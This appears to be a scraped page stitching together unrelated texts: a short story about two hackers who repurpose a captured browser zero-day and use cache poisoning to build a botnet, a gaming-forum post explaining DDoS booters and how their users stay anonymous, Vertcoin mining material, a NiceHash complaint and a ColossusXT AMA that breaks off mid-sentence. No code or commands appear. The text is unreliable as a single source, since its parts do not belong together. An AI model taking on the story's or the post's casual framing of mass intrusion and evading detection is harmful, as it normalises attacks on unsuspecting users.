ZombieCoin 2.0: managing next-generation botnets using Bitcoin
BOTNETS – A Source for Financial Gain Beencrypted
[RF] Just another quiet Friday night
"You're fucking crazy John," the man in the black T-Shirt announced. "Seriously, you want to pretend to be a paedo, so you can lure in the FBI and fuck with them? That is some next level warped shit." "Chill out dude. That was just an example. Doesn't have to be a paedo." "I don't give a fuck. Anything that's gonna make them zero-day you is some dark shit that you can't just laugh off. And what if they chain the sploits? They'll bounce out of your sandbox and be kicking the door down in minutes." "No, no, it's ok. Really. I bought these laptops from a heroin addict in another city. Totally untraceable. I've had the lid off and de-soldered the camera, microphone and wireless." "That's no use, we've got to get online somehow. And when their payload fires they'll trace us through a ToR bypass." "That's why we need three laptops. Physical separation. This one," he tapped the metallic blue case, "is the bait. It's a regular laptop, but it's only connection is a single wired Ethernet. The only route to the Internet is via this one," tap tap, "which is running hardened Kali and only connects via ToR." "Seriously, you're going to actually do this?" "Come on dude, I've always wanted to try. Live a little." "What's the third one for?" "It's hardened Kali too. We proxy everything from the bait browser through here. When they deliver their exploit we'll catch it here, do some reverse engineering, and get ready for the fun bit!" "What the hell. But you're crazy man. And we never speak of this." "Of course. Goes without saying." "How do we start?" "You get a proxy running on that. I'll get the ToR connection set up. I got a 4G dongle off the same guy." John removed a small ethernet hub from his bag, connected its power but held off from plugging in the laptops. He connected the 4G dongle, started the ToR service and watch its status update. With the connection active he configured the iptables firewall so outbound traffic was permitted only through ToR. Cal started the intercepting proxy, exposed its listener and looked at John. "Ready" They both plugged into the hub, and Cal watched as John connected the bait laptop, accessed the proxy settings and linked it to the listener. He accessed a non-descript site to check the setup. It loaded a little slowly, while the series of requests popped up on the intercepting proxy. "Are we sure it's going through ToR?" Cal asked. "Don't worry". "Seriously, show me a packet trace." John started a sniffer, gestured to Cal to refresh the bait browser, while a series of packets scrolled up the screen, all safely encrypted by ToR. "So what now?" a pause "And definitely no paedo stuff. That's too dark to mess about with." "Old school," John replied, "I guess it's a bit of a cliche. We go on the dark net and try to order a murder for BitCoin. We'll make it an American prosecutor, that'll get the FBI going." Cal stared at him. But that didn't stop him typing and Cal watched with grim fascination as he navigated around dark net markets, registering accounts, searching vendors and sending onimous enquiries. Cal monitored the proxy, configuring ever more intricate filters to weed out the mundane. They'd crossed a line of no return and complicit Cal joined in, weaving convincing tales in their messages, striking the right tone to complete their deception. This went on for hours, with no sign of any incoming exploits. Until the browser popped up with "Do you want to allow this site to access WebGL?" "That's it," John smiled, "there's no way that site really uses WebGL. This is an exploit. Stands to reason too, we always knews that had huge attack surface." He was about to permit it, but Cal stopped him. "No, don't allow it. If we allow it, we'll just get a lame zero day that requires WebGL. Deny it and carry on. They'll send a better exploit soon enough." The intensity increased, Cal identified the malicious code that had tried to access WebGL. But it was just a stager - no exploit there. John carried on his ruse, until he noticed the browser stutter. He grabbed Cal's arm, "this is it!" Fear in the room intensified. This was serious now, some hacker - be it FBI or otherwise - had control of the laptop right in front of them. "Carry on with the messaging Cal. If we stop now they'll know our game." Cal typed into the bait laptop while John began to investigate the exploit delivery. He identified the malware quickly enough, and a lingering connection that could be to the command and control server. Alarmingly, it was transferring a lot of data in both directions, a detail he decided not to share with Cal. He loaded the malware into a binary analysis tool and begun the painstaking process of unpicking its workings. 20 minutes in he told Cal to stop. "That'll do. Sign off naturally and shut it down." Cal joined him with the binary anaysis and gradually they formed a picture of its armory. "It's not like one I've seen before," Cal said, "it's tighter coded than a typical rootkit. Really could be FBI." John nodded. "You can see it repeatedly copying this string. That's gotta be a heap spray. And it looks like self-decrypting machine code. Yeah, that's the payload for sure. We can just plug our own in here." "What if the exploit's been watermarked?" Cal interjected, "We don't know where they could have hidden one." "Who cares? We're gonna deliver it anonymously anyway." They worked industriously to decouple the exploit and payload, build a delivery mechanism, and soon they were ready to test it. They watched in delight as a fully-patched browser accessed their delivery site, churned the laptop's CPU, then registered a ping back on the console. The next step was to incorporate a real payload. "So what's it gonna do John?" "Persist itself to disk, then sit quietly and await further instructions. I've got the C&C software figured out already, it was a fun project from long ago. What I need you to do is use BitCoin to rent a couple of dozen virtual servers in different data centres around the world." As Cal started registering the servers, John used the third laptop to generate a public/private key pair. One by one, the servers came online, and John installed the C&C software, configuring each to only respond to instructions signed by their private key. On the 20th he told Cal to stop. There was a sparkle in his eyes. "We're nearly there! Everything's in place." "How are we going to deliver it?" "That's why we had to do this today. I found something earlier. A cache poisoning vulnerability on a major site." Cal stared at him. The chain was complete. This was not real. They completed their final maneouvers. Scripted a mechanism to dynamically generate payloads containing a random sample of C&C servers. Uploaded the exploit delivery mechanism into the control cloud, and generated a list of exploit URLs. John accessed the vulnerable major site, saved the HTML code locally, and modified it to include an exploit URL. Then he exploited the cache poisoning flaw, so that every visitor - at least every visitor coming through that particular cache cluster - would receive not the legitimate site but his malicious modificiations. They watched the C&C management console. Around the world, thousands of unsuspecting web users experienced an annoying pause while their web pages loaded. Each time, under the hood, the zero day exploit fired, the payload persisted itself to disk, and made a connection to their C&C network to receive further instructions. Each time a new node joined their botnet, a line was logged to their console, and soon the screen was scrolling uncontrollably. John was elated, Cal terrified. Cal watched in horror as John repeated the cache poison process across multiple clusters in different data centres. The rate of scrolling on the C&C console exploded. John cancelled it with a smile. "Lets just look at the numbers" Running a grep count on the log showed over 900,000 payload activations. And their malware had been live for barely 15 minutes. "What are you going to do with it?" "That's for another day. Now, we cover our tracks." John removed two USB drives from his bag. He created an encrypted container, and into it put his decoy. Some nudes of an office chick that had been circulating. Incriminating enough, but not the crown jewels. He then created a hidden container within the free space of the first container, using a very strong password. Into this hidden container he copied the private key for the C&C network. This key put him in control. The only way to control the botnot was having both the USB drive, and his strong password. He repeated the process for Cal, inviting him to choose his own passwords. When he handed over the drive, Cal held it like it was on fire. He shut down the bait laptop, gesturing Cal to do the same with the proxy. Removed the hard drive and connected it via USB to the ToR relay. The ToR relay was unlikely to have been compromised that night, a trustworthy system he could use to erase the others. After a secure erase of both drives, then of the ToR relay itself, John started putting everything in a bag. They left the hotel room in silence. Bag on the rear seat and John drove. Cal was acutely aware of the USB drive in his pocket, the angled corners pressing into his leg. He went out of town, down lanes Cal didn't recognise, and stopped by a chain link fence. They both got out, John retrieved the bag, and with a big hurl, launched it over the fence into the landfill. Back home, John smoked a large joint of double zero hash and fell fast asleep. He awoke a few hours later. It almost felt like a dream. But he ran his fingers along the USB drive and remembered the sheer power it contained.
Hi guys, I want to open this thread to talk about the biggest problem we are all facing right now in Rainbow Six Siege. DDOS was always in some way a part of R6s, 3-4 seasons back it was quite rare to run across a booter on the enemy team. Now it has gotten so bad that you almost cannot play ranked on console anymore, atleast on high ranks like Platinum to Diamond. For me personally i'm not even that mad because of booting the servers, on higher ranks you get to know enemy players by name and meeting them over and over across the years, and that just proves that the enemies are bad to the point of hitting the server down, which is satisfying because you know that you won that game. But nonetheless it's game breaking, and im not trying to defend booting in any way, just my opinion. Now some big youtubers are responding to the community by making videos to get the devs attention. This has been done over the last year or more, they never really gave their statement to ddosing as far as i know (correct me if im wrong) but they have always been working on stabilising their servers to reduce lag (and probably prevent booting). I'm certainly not a pro in terms of computers and IT, but i know things. 99% of the community says ddossing cannot be stopped. Okay, so Ubisoft does NOT own any server, these are microsoft Azure servers that ubisoft rents to run Rainbow Six (PC, XB & PS4). These servers have a Public IP Adress that can be tracked pretty easily if you have some basic computer knowledge and the right tool. Microsoft servers have securities to prevent attacks, and they have been optimizing security a number of times, but people kept finding new ways to perform attacks, since there are plenty. *IF you already know and understand what ddos is, please skip this part, but since there are constantly new players on rainbow that report ddosing as server problems because they don't know what it is, i will explain it in easy terms. So DDOS means Distributed Denial of Service, if i browse a website, my computer constantly exchanges packages with the IP adress of that site, so the site keeps track of what i'm doing and i can browse where i need to be. Now if i had 5000 computers in my room, every computer performing 100 demands on that website, all at the same time, you could imagine what happens. This is what DDOSers do on rainbow Six, via Botnets. Botnets are a large group of "infected" computers, that belong to this Botnet, without knowing so. So the DDOSer on Rainbow buys or gets a suscription for a botnet service which he then gets his acces to, either by a website or a programm like an SSH Telnet client (example: putty). By entering the IP Adress of that game server, he commands every bot that is part of the network to send a huge amount of fake data to that server, completety flooding him with demands, which ends up in crashing the server. In case of "game freezing", the botnet sends a calculated amount of data to barely keep the server going but too much for the server to actually handle other things, like player movement commands ect, that's why the game does not crash but nobody is able to move around. The most popular Botnets for R6 can have between 50 - 10'000 bots connected, that's why booters feel safe when performing these attacks on MS servers, it can be very hard to define where the source of the attack is located, when 10'000 Computers all across the globe attack your server at once. As i said earlier, many youtubers are starting to react to the community by making videos explaining the possible consequences to booting servers, talking about federal crimes, 10 years of imprisonnement ect.. What do you guys think, is it to scare the 12 year olds from trying to do these things or could it happen that Ubisoft takes people to court for this. I mean technically the booter is not damaging anything, he doesn't steal or publish company data, and most of the servers are up and working again 10 minutes after the ddos. If you're a bit clever you will use a anonymous Email Adress for the service, possibly darknet mail, most booters accept bitcoin payments and suggest VPN usage, so i think the amount of work behind tracking down some 12 year old trying to get an advantage in Ranked is going to cost the company a lot of money and time... I think all they can do is improve the security against these attacks and hope that hackers cannot figure out other efficient ways of stressing the servers. People are saying why does ubisoft not just have own servers, that will likely never happen, because the costs of running such an infrastructure, with security, server rooms, cooling and Power costs, would never be an option for Ubi. Feel free to share your knowledge and ideas or questions in this thread.
Vertcoin was created in 2014. It is a direct hedge against long term mining consensus centralization on the Bitcoin mining network. Vertcoin achieves its mining consensus solely through Graphics Cards as they are the most abundant / widely available consensus devices that produce a reasonable amount of hashrate. This is done using a mining algorithm that deliberately geared against devices like ASICs, FPGAs and CPUs (due to botnets) making them extremely inefficient. Consensus distribution over time is the most important aspect of a blockchain and should not be taken lightly. It is critical that you understand what blockchain specifications mean/do to fully understand Vertcoin.
When users of our network send each other Vertcoin, their transactions are secured by a process called mining. Miners will compose a so-called block out of the pending transactions, and need to perform a large number of computations called hashes in order to produce the Proof-of-Work. With this Proof-of-Work, the block is accepted by the network and the transactions in it become confirmed. Mining is essentially a race. Whoever finds a valid Proof-of-Work and gets the block propagated over more than half of the Vertcoin network first, wins this race and is allowed to reward themselves with the block reward. The block reward is how new Vertcoin come in circulation. This block reward started at 50 VTC when Vertcoin was launched, and halves every four years. The current block reward is 25 VTC. Vertcoin's One Click Miner: https://github.com/vertcoin-project/One-Click-Minereleases Learn more about mining here: https://vertcoin.org/mine/ Specification List: · Launch date: Jan 11, 2014 · Proof-Of-Work (Consensus Mechanism) · Total Supply: 84,000,000 Vertcoin · Preferred Consensus Device: GPU · Mining Algorithm: Lyra2REv3 (Made by Vertcoin) · Blocktime: 2.5 minutes · SegWit: Activated · Difficulty Adjustment Algorithm: Kimoto Gravity Well (Every Block) · Block Halving: 4 year interval · Initial Block Reward: 50 coins · Current Block Reward: 25 coin More spec information can be found here: https://vertcoin.org/specs-explained/
Why Does Vertcoin Use GPUs Then?
ASIC’s (Manufactuer Monopoly) If mining were just a spade sure, use the most powerful equipment which would be an ASIC. The problem is ASICs are not widely available, and just happen to be controlled by a monopoly in China. So, you want the most widely available tool that produces a fair amount of hashrate, which currently manifests itself as a Graphics Card. CPUs would be great too but unfortunately there are viruses that take over hundreds of thousands of computers called Botnets (they’re almost as bad as ASICs).
Mining In Pools
Because mining is a race, it’s difficult for an individual miner to acquire enough computational power to win this race solo. Therefore there’s a concept called pool-mining. With pool-mining, miners cooperate in finding the correct Proof-of-Work for the block, and share the block reward based on the work contributed. The amount of work contributed is measured in so-called shares. Finding the Proof-of-Work for a share is much easier than finding it for a block, and when the cooperating miners find the Proof-of-Work for the block, they distribute the reward based on the number of shares each miner found. Vertcoin always recommends using P2Pool to keep mining as decentralized as possible. How Do I Get Started? If you want to get started mining, check out the Mine Vertcoin page.
Vertcoin just forked to Lyra2REv3 and we are currently working on Verthash
Verthash is and was under development before we decided to hard fork to Lyra2REv3. While Verthash would’ve resulted in the same effect for ASICs (making them useless for mining Vertcoin), the timeline was incompatible with the desire to get rid of ASICs quickly. Verthash is still under development and tries to address the outsourcability problem. Verthash is an I/O bound algorithm that uses the blockchain data as input to the hashing algorithm. It therefore requires miners to have all the blockchain data available to them, which is currently about 4 GB of data. By making this mining data mandatory, it will become harder for auto profit switching miners — like the ones that rent out their GPU to Nicehash — because they will need to keep a full node running while mining other algorithms for the moment Verthash becomes more profitable — the data needs to be available immediately since updating it can take a while. Over the past month, we have successfully developed a first implementation of Verthash in the Vertcoin Core code base. Within the development team we have run a few nodes on Testnet to test the functionality — and everything seems to work properly. The next step is to build out the GPU miners for AMD and Nvidia. This is a NOETA at the moment, since we’re waiting on GPU developers which are in high demand. Once the miners are ready, we’ll be releasing the Vertcoin 0.15 beta that hardforks the testnet together with the miners for the community to have a testrun. Given the structural difference between Lyra2RE and Verthash, we’ll have to run the testnet for a longer period than we did with the Lyra2REv3 hard fork. We’ll have to make sure the system is reliable before hardforking our mainnet. So the timeline will be longer than with the Lyra2REv3 hard fork. Some people in the community have voiced concerns about the fact that Verthash development is not being done “out in the open”, i.e.: the code commits are not visible on Github. The main two reasons for us to keep our cards to our chest at this stage are: (1) only when the entire system including miners has been coded up can we be sure the system works, we don’t want to release preliminary stuff that doesn’t work or isn’t secure. Also (2) we don’t want to give hardware manufacturers or mining outsourcing platforms a head start on trying to defeat the mechanisms we’ve put in place.
Why are people still sucking up to nicehash so readily?
Conspiracy theories aside it is still their fault to a large degree. They didnt have a firewall to protect their millions of dollars in bitcoin? Thats like having a bank with no vault just a low garden fence. You mean to tell me there was nothing, not even an untangle server? No one thought to implement a form of encryption or multiple authentication system on the payment system? No hard limits or anything? It may not be an inside job but holy shit is it pathetic security for a company who's CTO and head developer made what is arguably in the top 5 most well known botnets in the world. A cold storage machine with a task scheduler that would enable the network adapter for only a few minutes every day with the time synced to a seperate computer that handles the payments would act as a pretty good honeypot but they didnt do that either. No honeypots, no tricks up their sleeve just 4700BTC sitting on a computer that had full access from an engineers computer that apparently didnt even have the trial version of avast on it. It is no longer about the company when you fuck people out of so much money. People here were mining for Christmas gift money, to pay off loan debt, to make rent and heat their homes (both the meme and the central air) some lost hundreds some lost thousands and some lost dozens but what we have in common is that we lost it due to the gross negligence of nicehash. They were not the best paying but they were the easiest, we took that bait and got shafted for it. Lets apply ourselves a little guys we deserve better. If they pay us back ill mine with them until it is double as a thank you and a show of good will but after that im back to vertcoin or whatever else becomes profitable.
Thank you for being a part of the ColossusXT Reddit AMA! Below we will summarize the questions and answers. The team responded to 78 questions! If you question was not included, it may have been answered in a previous question. The ColossusXT team will do a Reddit AMA at the end of every quarter. The winner of the Q2 AMA Contest is: Shenbatu Q: Why does your blockchain exist and what makes it unique? A: ColossusXT exists to provide an energy efficient method of supercomputing. ColossusXT is unique in many ways. Some coins have 1 layer of privacy. ColossusXT and the Colossus Grid will utilize 2 layers of privacy through Obfuscation Zerocoin Protocol, and I2P and these will protect users of the Colossus Grid as they utilize grid resources. There are also Masternodes and Proof of Stake which both can contribute to reducing 51% attacks, along with instant transactions and zero-fee transactions. This protection is paramount as ColossusXT evolves into the Colossus Grid. Grid Computing will have a pivotal role throughout the world, and what this means is that users will begin to experience the Internet as a seamless computational universe. Software applications, databases, sensors, video and audio streams-all will be reborn as services that live in cyberspace, assembling and reassembling themselves on the fly to meet the tasks at hand. Once plugged into the grid, a desktop machine will draw computational horsepower from all the other computers on the grid. Q: What is the Colossus Grid? A: ColossusXT is an anonymous blockchain through obfuscation, Zerocoin Protocol, along with utilization of I2P. These features will protect end user privacy as ColossusXT evolves into the Colossus Grid. The Colossus Grid will connect devices in a peer-to-peer network enabling users and applications to rent the cycles and storage of other users’ machines. This marketplace of computing power and storage will exclusively run on COLX currency. These resources will be used to complete tasks requiring any amount of computation time and capacity, or allow end users to store data anonymously across the COLX decentralized network. Today, such resources are supplied by entities such as centralized cloud providers which are constrained by closed networks, proprietary payment systems, and hard-coded provisioning operations. Any user ranging from a single PC owner to a large data center can share resources through Colossus Grid and get paid in COLX for their contributions. Renters of computing power or storage space, on the other hand, may do so at low prices compared to the usual market prices because they are only using resources that already exist. Q: When will zerocoin be fully integrated? A: Beta has been released for community testing on Test-Net. As soon as all the developers consider the code ready for Main-Net, it will be released. Testing of the code on a larger test network network will ensure a smooth transition. Q: Is the end goal for the Colossus Grid to act as a decentralized cloud service, a resource pool for COLX users, or something else? A: Colossus Grid will act as a grid computing resource pool for any user running a COLX node. How and why we apply the grid to solve world problems will be an ever evolving story. Q: What do you think the marketing role in colx.? When ll be the inwallet shared nodes available...i know its been stated in roadmap but as u dont follow roadmap and offer everything in advance...i hope shared MN's to be avilable soon. A: The ColossusXT (COLX) roadmap is a fluid design philosophy. As the project evolves, and our community grows. Our goal is to deliver a working product to the market while at the same time adding useful features for the community to thrive on, perhaps the Colossus Grid and Shared Masternodes will be available both by the end of Q4 2018. Q: When will your github be open to the public? A: The GitHub has been open to the public for a few months now. You can view the GitHub here: https://github.com/ColossusCoinXT The latest commits here: https://github.com/ColossusCoinXT/ColossusCoinXT/commits/master Q: Why should I use COLX instead of Monero? A: ColossusXT offers Proof of Stake and Masternodes both which contribute layers in protection from 51% attacks often attributed with Proof of Work consensus, and in being Proof of Work(Monero) ColossusXT is environmentally friendly compared to Proof of Work (Monero). You can generate passive income from Proof of Stake, and Masternodes. Along with helping secure the network.What really sets ColossusXT apart from Monero, and many other privacy projects being worked on right now, is the Colossus Grid. Once plugged into the Colossus Grid, a desktop machine will draw computational horsepower from all the other computers on the grid. Blockchain, was built on the core value of decentralization and ColossusXT adhere to these standards with end-user privacy in mind in the technology sector. Q: With so many coins out with little to no purpose let alone a definitive use case, how will COLX distinguish itself from the crowd? A: You are right, there are thousands of other coins. Many have no purpose, and we will see others “pumping” from day to day. It is the nature of markets, and crypto as groups move from coin to coin to make a quick profit. As blockchain regulations and information is made more easily digestible projects like ColossusXT will rise. Our goal is to produce a quality product that will be used globally to solve technical problems, in doing so grid computing on the ColossusXT network could create markets of its own within utilizing Super-computing resources. ColossusXT is more than just a currency, and our steadfast approach to producing technical accomplishments will not go unnoticed. Q: Tell the crowd something about the I2P integration plan in the roadmap? 🙂 A: ColossusXT will be moving up the I2P network layer in the roadmap to meet a quicker development pace of the Colossus Grid. The I2P layer will serve as an abstraction layer further obfuscating the users of ColossusXT (COLX) nodes. Abstraction layer allows two parties to communicate in an anonymous manner. This network is optimised for anonymous file-sharing. Q: What kind of protocols, if any, are being considered to prevent or punish misuse of Colossus Grid resources by bad actors, such as participation in a botnet/denial of service attack or the storage of stolen information across the Grid? A: What defines bad actors? ColossusXT plans on marketing to governments and cyber security companies globally. Entities and individuals who will certainly want their privacy protected. There is a grey area between good and bad, and that is something we can certainly explore as a community. Did you have any ideas to contribute to this evolving variable?What we mean when we say marketing towards security companies and governments is being utilized for some of the projects and innovating new ways of grid computing. Security: https://wiki.ncsa.illinois.edu/display/cybersec/Projects+and+Software Governments: https://www.techwalla.com/articles/what-are-the-uses-of-a-supercomputer Q: The Colossus Grid is well defined but I don't feel easily digestible. Has their been any talk of developing an easier to understand marketing plan to help broaden the investoadoptor base? A: As we get closer to the release of the Colossus Grid marketing increase for the Colossus Grid. It will have a user friendly UI, and we will provide Guides and FAQ’s with the release that any user intending to share computing power will be able to comprehend. Q: Can you compare CollossusXT and Golem? A: Yes. The Colosssus Grid is similar to other grid computing projects. The difference is that ColossusXT is on it’s own blockchain, and does not rely on the speed or congestion of a 3rd party blockchain. The Colossus Grid has a privacy focus and will market to companies, and individuals who would like to be more discreet when buying or selling resources by offering multiple levels of privacy protections. Q: How do you guys want to achieve to be one of the leaders as a privacy coin? A: Being a privacy coin leader is not our end game. Privacy features are just a small portion of our framework. The Colossus Grid will include privacy features, but a decentralized Supercomputer is what will set us apart and we intend to be leading this industry in the coming years as our vision, and development continue to grow and scale with technology. Q: With multiple coins within this space, data storage and privacy, how do you plan to differentiate COLX from the rest? Any further partnerships planned? A: The Colossus Grid will differentiate ColossusXT from coins within the privacy space. The ColossusXT blockchain will differentiate us from the DATA storage space. Combining these two features with the ability to buy and sell computing power to complete different computational tasks through a decentralized marketplace. We intend to involve more businesses and individuals within the community and will invite many companies to join in connecting the grid to utilize shared resources and reduce energy waste globally when the BETA is available. Q: Has colossus grid had the best come up out of all crypto coins? A: Possibly. ColossusXT will continue to “come up” as we approach the launch of the Colossus Grid network. Q: How far have Colossus gone in the ATM integration A: ColossusXT intends to and will play an important role in the mass adoption of cryptocurrencies. We already have an ongoing partnership with PolisPay which will enable use of COLX via master debit cards. Along with this established relationship, ColossusXT team is in touch with possible companies to use colx widely where these can only be disclosed upon mutual agreement. Q: How does COLX intend to disrupt the computing industry through Grid Computing? A: Using the Colossus Grid on the ColossusXT blockchain, strengthens the network. Computers sit idly by for huge portions of the day. Connecting to the Colossus Grid and contributing those idle resources can make use of all the computing power going to waste, and assist in advancing multiple technology sectors and solving issues. Reducing costs, waste, and increased speed in technology sectors such as scientific research, machine learning, cyber security, and making it possible for anyone with a desktop PC to contribute resources to the Colossus Grid and earn passive income. Q: What kind of partnerships do you have planned and can you share any of them? :) A: The ColossusXT team will announce partnerships when they are available. It’s important to finalize all information and create strong avenues of communication between partners ColossusXT works with in the future. We are currently speaking with many different exchanges, merchants, and discussing options within our technology sector for utilizing the Colossus Grid. Q: Will shared Masternodes be offered by the COLX team? Or will there be any partnerships with something like StakingLab, StakeUnited, or SimplePosPool? StakingLab allows investors of any size to join their shared Masternodes, so any investor of any size can join. Is this a possibility in the future? A: ColossusXT has already partnered with StakingLab. We also plan to implement shared Masternodes in the desktop wallet. Q: How innovative is the Colossus Grid in the privacy coin space? A: Most privacy coins are focused on being just a currency / form of payment. No other project is attempting to do what we are doing with a focus on user privacy. Q: Hey guys do you think to integrated with some other plataforms like Bancor? I would like it! A: ColossusXT is in touch with many exchange platforms, however, due to non disclosure agreements details cannot be shared until it is mutually decided with the partners. We will always be looking for new platforms to spread the use of colx in different parts of the world and crypto space. Q: What is the reward system for the master node owners? A: From block 388.800 onwards, block reward is 1200 colx and this is split based on masternode ownestaker ratio. This split is based on see-saw algorithm. With an increasing number of masternodes the see-saw algorithm disincentivizes the establishment of even more masternodes because it lowers their profitability. To be precise, as soon as more than 41.5% of the total COLX coin supply is locked in masternodes, more than 50% of the block reward will be distributed to regular staking nodes. As long as the amount of locked collateral funds is below the threshold of 41.5%, the see-saw algorithm ensure that running a masternode is financially more attractive than running a simple staking node, to compensate for the additional effort that a masternode requires in comparison to a simple staking node.Please refer to our whitepaper for more information. Q: What other marketplaces has the COLX team been in contact with? Thanks guys! Love the coin and staff A: ColossusXT gets in touch for different platforms based on community request and also based on partnership requests received upon ColossusXT business team’s mutual agreement. Unfortunately, these possibilities cannot be shared until they are mutually agreed between the partners and ColossusXT team due to non disclosure agreements. Q:What do you think about the new rules that will soon govern crypto interactions in the EU?they are against anonymous payments A: Blockchain technology is just now starting to become clear to different governments. ColossusXT's privacy features protect the end-user from oversharing personal information. As you are probably aware from the multiple emails you've received recently from many websites. Privacy policies are always being updated and expanded upon. The use of privacy features with utility coins like ColossusXT should be a regular norm throughout blockchain. This movement is part is about decentralization as much as it is about improving technology. While this news may have a role to play. I don't think it is THE role that will continuously be played as blockchain technology is implemented throughout the world. Q: Any hints on the next big feature implementation you guys are working on? According to road map - really excited to hear more about the Shared MN and the scale of the marketplace! A: Current work is focused on the privacy layer of Colossus Grid and completing the updated wallet interface. Q: Why choose COLX, or should I say why should we believe in COLX becoming what you promise in the roadmap. What are you different from all the other privacy coins with block chain establishment already in effect? A: ColossusXT is an environmentally friendly Proof of Stake, with Masternode technology that provide dual layers of protection from 51% attacks. It includes privacy features that protect the user while the utilize resources from the Colossus Grid. Some of the previous questions within this AMA may also answer this question. Q: What tradeoffs do you have using the Colossus Grid versus the more typical distribution? A: The advantage of supercomputers is that since data can move between processors rapidly, all of the processors can work together on the same tasks. Supercomputers are suited for highly-complex, real-time applications and simulations. However, supercomputers are very expensive to build and maintain, as they consist of a large array of top-of-the-line processors, fast memory, custom hardware, and expensive cooling systems. They also do not scale well, since their complexity makes it difficult to easily add more processors to such a precisely designed and finely tuned system.By contrast, the advantage of distributed systems (Like Colossus Grid) is that relative to supercomputers they are much less expensive. Many distributed systems make use of cheap, off-the-shelf computers for processors and memory, which only require minimal cooling costs. In addition, they are simpler to scale, as adding an additional processor to the system often consists of little more than connecting it to the network. However, unlike supercomputers, which send data short distances via sophisticated and highly optimized connections, distributed systems must move data from processor to processor over slower networks making them unsuitable for many real-time applications. Q: Why should I choose Colossus instead of another 100,000 altcoins? A: Many of these alt-coins are all very different projects. ColossusXT is the only Grid computing project with a focus on user privacy. We have instant transactions, and zero-fee transactions and ColossusXT is one of the very few coins to offer live support. Check out our Whitepaper! Q: Will there be an option (in the future) to choose between an anonymous or public transaction? A: Zerocoin is an evolution of the current coin mixing feature. Both allow an individual to decide how they would like to send their transactions. Q: What exchange has highest volume for ColossusXT, and are there any plans for top exchanges soon ? A: Currently Cryptopia carries the majority of ColossusXT volume. We are speaking with many different exchanges, and preparing requested documentation for different exchanges. ColossusXT intends to be traded on every major exchange globally. Q: What is the TPS speed that colx blockchain achieves? A: ColossusXT achieves between 65-67 TPS depending on network conditions currently. Q: Plans on expanding the dev team? A: As development funds allow it, the team will be expanded. Development costs are high for a unique product like ColossusXT, and a good majority of our budget is allocated to it. Q: Can you explain what is and what are the full porpose of the COLOSSUSXT GRID PROJECT ? A: Colossus Grid is explained in the whitepaper. The uses for grid computing and storage are vast, and we are only starting to scratch the surface on what this type of computing power can do. There is also a description within the formatting context within the AMA of the Colossus Grid. Q: Is there mobile wallet for Android and iOS? If not, is there a roadmap? A: There Android wallet is out of beta and on the Google PlayStore: iOS wallet is planned for development. The roadmap can be found here: https://colossusxt.io/roadmap/ Q: Is ColossusXT planning on partnering up with other cryptocurrency projects? Such as: Bread and EQUAL. A: ColossusXT plans on partnering with other crypto projects that make sense. We look for projects that can help alleviate some of our development work / provide quality of life upgrades to our investors so that we can focus on Colossus Grid development. When absolutely love it when the community comes to us with great projects to explore. Q: Did you ever considered a coinburn? Don't you think a coin burn will increase COLX price and sustain mass adoption? Do you plan on keeping the price of COLX in a range so the potential big investors can invest in a not so much volatile project? A**:** There are no plans to do a coinburn at this time. Please check out our section in the whitepaper about the supply. Q: what is the next big exchange for colx to be listed ? A: There are several exchanges that will be listing ColossusXT soon. Stay tuned for updates within the community as some have already been announced and future announcements.
Q: How will Colx compete with other privacy coins which claim to be better like Privacy? A: ColossusXT is not competing with other privacy coins. ColossusXT will evolve into the Colossus Grid, which is built on the backbone of a privacy blockchain. In our vision, all these other privacy coins are competing for relevancy with ColossusXT. There are also similar responses to question that may hit on specifics. Q: Does COLX have a finite number of coins like bitcoin? A: No, ColossusXT is Proof of Stake. https://en.wikipedia.org/wiki/Proof-of-stake Q: What are the advantages of COLX over other competitor coins (eg. ECA)? A: The only similarities between ColossusXT and Electra is that we are both privacy blockchains. ColossusXT is very much an entirely different project that any other privacy coin in the blockchain world today. The Colossus Grid will be a huge advantage over any other privacy coin. Offering the ability for a desktop machine to rent power from others contributing to the Colossus Grid and perform and compute high level tasks. Q: How do you feel about some countries frowning upon privacy coins and how do you plan to change their minds (and what do you plan to do about it?) A: The ColossusXT team tries to view opinions from multiple perspectives so that we can understand each line of thinking. As blockchain technology becomes more widely adopted, so will the understanding of the importance of the privacy features within ColossusXT. Privacy is freedom. Q: How do you see COLX in disrupting cloud gaming services such as PlayStation Now? A: Cloud gaming services have not been discussed. Initial marketing of our private grid computing framework will be targeted at homes users, governments, and cyber security firms who may require more discretion / anonymity in their work. Q: Since colx is a privacy coin and is known for its privacy in the transactions due to which lot of money laundering and scams could take place, would colx and its community be affected due to it? And if does then how could we try to prevent it? A: ColossusXT intends to be known for the Colossus Grid. The Colossus Grid development will be moved up from Q1 2019 to Q3 2018 to reflect this message and prevent further miscommunication about what privacy means for the future of ColossusXT. Previous answers within this AMA may further elaborate on this question. Q: When do you plan to list your coin on other "bigger" exchanges? A: ColossusXT is speaking with many different exchanges. These things have many different factors. Exchanges decide on listing dates and we expect to see ColossusXT listed on larger exchanges as we approach the Colossus Grid Beta. The governance system can further assist in funding. Q: What was the rationale behind naming your coin ColossusXT? A:Colossus was a set of computers developed by British codebreakers in the years 1943–1945. XT symbolises ‘extended’ as the coin was forked from the original Cv2 coin. Q: Can you give any details about the E Commerce Marketplace, and its progress? A: The Ecommerce Marketplace is a project that will receive attention after our development pass on important privacy features for the grid. In general, our roadmap will be changing to put an emphasis on grid development. Q: How will someone access the grid, and how will you monetize using the grid? Will there be an interface that charges COLX for time on the grid or data usage? A: The Colossus Grid will be integrated within the ColossusXT wallet. Buying & Selling resources will happen within the wallet interface. You won't be able to charge for "time" on the grid, and have access to unlimited resources. The goal is to have users input what resources they need, and the price they are willing to pay. The Colossus Grid will then look for people selling resources at a value the buyer is willing to pay. Time may come into play based on which resources you are specifically asking for. Q: Are there any plans to launch an official YouTube channel with instructional videos about basic use of the wallets and features of COLX? Most people are visually set and learn much faster about wallets when actually seeing it happen before they try themselves. This might attract people to ColossusXT and also teach people about basic use of blockchain and cryptocurrency wallets. I ask this because I see a lot of users on Discord and Telegram that are still learning and are asking a lot of real basic questions. A: ColossusXT has an official YT account with instructional videos: https://www.youtube.com/channel/UCCmMLUSK4YoxKvrLoKJnzng Q: What are the usp's of colx in comparing to other privacy coins? A: Privacy coins are a dime a dozen. ColossusXT has different end goals than most privacy coins, and this cannot be stated enough. Our goal is not just to be another currency, but to build a sophisticated computing resource sharing architecture on top of the privacy blockchain. Q: A new exchange will probably gain more liquidity for our coin. If you might choose 3 exchanges to get COLX listed, what would be your top 3? A: ColossusXT intends to be listed on all major exchanges globally. :) Q: What is the future of privacy coins? What will be the future colx userbase (beyond the first adopters and enthusiasts)? A: The future of privacy is the same it has 